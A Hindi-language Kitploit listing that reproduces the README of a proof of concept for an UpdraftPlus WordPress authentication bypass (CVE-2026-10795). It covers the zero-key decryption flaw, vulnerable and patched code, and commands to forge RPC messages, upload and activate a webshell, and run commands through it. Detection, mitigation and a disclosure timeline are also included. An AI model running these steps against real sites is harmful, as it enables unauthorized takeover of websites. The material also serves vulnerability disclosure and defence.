Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-10795 — CVE-2026-10795 – UpdraftPlus प्रमाणीकरण बाईपास | Kitploit
उपकरण/GitHubGitHub/izxci/cve-2026-10795
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubizxci/cve-2026-10795

CVE-2026-10795

CVE-2026-10795 – UpdraftPlus प्रमाणीकरण बाईपास

रिपॉजिटरी देखें
12 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-10795

CVE-2026-10795 – UpdraftPlus प्रमाणीकरण बाईपास

CVE-2026-10795 – UpdraftPlus प्रमाणीकरण बाईपास PoC

⚠️ अस्वीकरण: यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों के लिए है।
इसका उपयोग केवल उन प्रणालियों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।
लेखक किसी भी दुरुपयोग के लिए उत्तरदायी नहीं है।


📋 अवलोकन

फ़ील्डविवरण
प्लगइनUpdraftPlus: WP Backup & Migration
प्रभावित संस्करण≤ 1.26.4
पैच किया गया संस्करण1.26.5
CVSS स्कोर8.1 (उच्च)
कमजोरी का प्रकारअप्रमाणित प्रमाणीकरण बाईपास → RCE
खोजकर्ताvtim (Wordfence Bug Bounty)
इनाम$5,200

🔍 कमजोरी सारांश

UpdraftPlus, UpdraftCentral से जुड़ी साइटों के लिए प्रत्येक पेज लोड पर एक अप्रमाणित RPC लिसनर पंजीकृत करता है।

decrypt_message() फ़ंक्शन $rsa->decrypt() के रिटर्न वैल्यू को मान्य करने में विफल रहता है।
जब RSA डिक्रिप्शन विफल होता है, तो false को Rijndael::setKey() में पास किया जाता है, जो एक निर्धारित शून्य-कुंजी AES-128 की में परिवर्तित हो जाता है।

एक हमलावर निम्नलिखित कर सकता है:

  1. शून्य कुंजी से एन्क्रिप्टेड udrpc_message जाली बनाए
  2. सर्वर से इसे सफलतापूर्वक डिक्रिप्ट करवाए
  3. कनेक्टेड एडमिनिस्ट्रेटर के रूप में मनमानी RPC कमांड निष्पादित करे
  4. एक दुर्भावनापूर्ण प्लगइन अपलोड और सक्रिय करे → रिमोट कोड निष्पादन

🧬 कमजोर कोड

root@kitploit:~
// updraftplus/includes/class-remote-communications-v2.php
// Lines 460-491 (version 1.26.4)

$sym_key = $rsa->decrypt($sym_key);
// ❌ No return value check!

$rij->setKey($sym_key);  // false → all-zero key
return $rij->decrypt($ciphertext);

✅ पैच किया गया कोड

root@kitploit:~
$sym_key = $rsa->decrypt($sym_key);

// ✅ Added in 1.26.5
if (false === $sym_key || !is_string($sym_key) || strlen($sym_key) < 16) {
    return false;
}

$rij->setKey($sym_key);
return $rij->decrypt($ciphertext);

📁 रिपॉजिटरी संरचना

root@kitploit:~
updraftplus-auth-bypass/
├── README.md
├── poc.py                  # मुख्य एक्सप्लॉइट स्क्रिप्ट
├── requirements.txt        # Python निर्भरताएँ
├── payloads/
│   ├── list_plugins.py     # स्थापित प्लगइन सूचीबद्ध करें
│   ├── upload_shell.py     # वेबशेल प्लगइन अपलोड करें
│   └── activate_plugin.py  # अपलोड किए गए प्लगइन को सक्रिय करें
├── shell/
│   ├── build_shell.py      # वेबशेल ZIP बनाएँ
│   └── test-shell.php      # न्यूनतम PHP वेबशेल
└── docs/
    ├── technical-analysis.md
    └── patch-diff.md

⚙️ स्थापना

root@kitploit:~
git clone https://github.com/yourname/updraftplus-auth-bypass
cd updraftplus-auth-bypass
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests==2.31.0
pycryptodome==3.20.0

🧪 परीक्षण वातावरण सेटअप

1. XAMPP स्थापित करें

root@kitploit:~
https://www.apachefriends.org
प्रारंभ: Apache + MySQL

2. WordPress + UpdraftPlus 1.26.4 स्थापित करें

root@kitploit:~
# WordPress को htdocs में रखें
C:/xampp/htdocs/wordpress/

# कमजोर प्लगइन संस्करण स्थापित करें
# डाउनलोड: https://plugins.trac.wordpress.org/browser/updraftplus/tags/1.26.4

3. UpdraftCentral से कनेक्ट करें

root@kitploit:~
WordPress एडमिन → सेटिंग्स → UpdraftPlus → UpdraftCentral टैब → कनेक्ट करें

⚠️ आवश्यक: कमजोरी का शोषण करने के लिए साइट को UpdraftCentral से कनेक्ट होना आवश्यक है।


🚀 उपयोग

बुनियादी उपयोग

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --user-id 1

प्लगइन सूचीबद्ध करें

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --cmd plugin.get_plugins

वेबशेल अपलोड करें

root@kitploit:~
# चरण 1: शेल ZIP बनाएँ
python shell/build_shell.py

# चरण 2: अपलोड करें
python poc.py --url http://localhost/wordpress/ --cmd upload_shell

# चरण 3: सक्रिय करें
python poc.py --url http://localhost/wordpress/ --cmd activate_shell

# चरण 4: RCE का परीक्षण करें
curl "http://localhost/wordpress/wp-content/plugins/test-shell/test-shell.php?cmd=whoami"

🔬 यह कैसे काम करता है

root@kitploit:~
poc.py
  │
  ├─ 1. खराब RSA-एन्क्रिप्टेड sym_key (गार्बेज बाइट्स) बनाएँ
  │
  ├─ 2. ZERO AES-128 कुंजी (0x00 * 16) के साथ RPC पेलोड को एन्क्रिप्ट करें
  │
  ├─ 3. udrpc_message बनाएँ:
  │       [3-बाइट हेक्स लंबाई][नकली sym_key][16-बाइट हेक्स सिफरलेन][सिफरटेक्स्ट]
  │
  ├─ 4. लक्ष्य पर POST करें (कोई प्रमाणीकरण, कोई नॉन्स, कोई कुकीज़ आवश्यक नहीं)
  │
  └─ 5. सर्वर-साइड:
          rsa->decrypt(garbage) → false
          setKey(false)         → 0x00 key
          decrypt(ciphertext)   → हमारा पेलोड ✅
          wp_set_current_user() → एडमिन एक्सेस
          RPC कमांड निष्पादित  → RCE 💀

🛡️ पहचान और शमन

शमन

root@kitploit:~
अपडेट करें UpdraftPlus को तुरंत संस्करण 1.26.5 पर।

पहचान (लॉग विश्लेषण)

root@kitploit:~
# udrpc_message के साथ संदिग्ध POST अनुरोधों की तलाश करें
grep "udrpc_message" /var/log/apache2/access.log

# Wordfence उपयोगकर्ता 3 जून, 2026 से सुरक्षित हैं

समझौता के संकेतक

root@kitploit:~
- अप्रत्याशित प्लगइन स्थापनाएँ
- wp-content/plugins/ में नई PHP फ़ाइलें
- udrpc_message पैरामीटर के साथ WordPress रूट पर POST अनुरोध
- WordPress लॉग में अप्रत्याशित एडमिन-स्तरीय क्रियाएँ

📅 प्रकटीकरण समयरेखा

तिथिघटना
1 जून, 2026कमजोरी Wordfence Bug Bounty के माध्यम से प्रस्तुत की गई
3 जून, 2026मान्य किया गया और विक्रेता को प्रकट किया गया
3 जून, 2026Wordfence Premium फ़ायरवॉल नियम तैनात किया गया
4 जून, 2026विक्रेता ने स्वीकार किया
5 जून, 2026पैच जारी (v1.26.5)
3 जुलाई, 2026Wordfence Free सुरक्षा सक्रिय

📚 संदर्भ

  • Wordfence सलाह
  • UpdraftPlus प्लगइन पेज
  • phpseclib RSA दस्तावेज़ीकरण
  • प्लगइन परिवर्तन लॉग

👤 श्रेय

  • मूल खोज: vtim (Wordfence Bug Bounty Program)
  • PoC लेखक: izxci
  • उद्देश्य: शैक्षिक / सुरक्षा अनुसंधान

📜 लाइसेंस

root@kitploit:~
MIT License – केवल शैक्षिक उपयोग के लिए।
जिन प्रणालियों के आप स्वामी नहीं हैं, उनके विरुद्ध अनधिकृत उपयोग अवैध है।
टूल डाउनलोड करें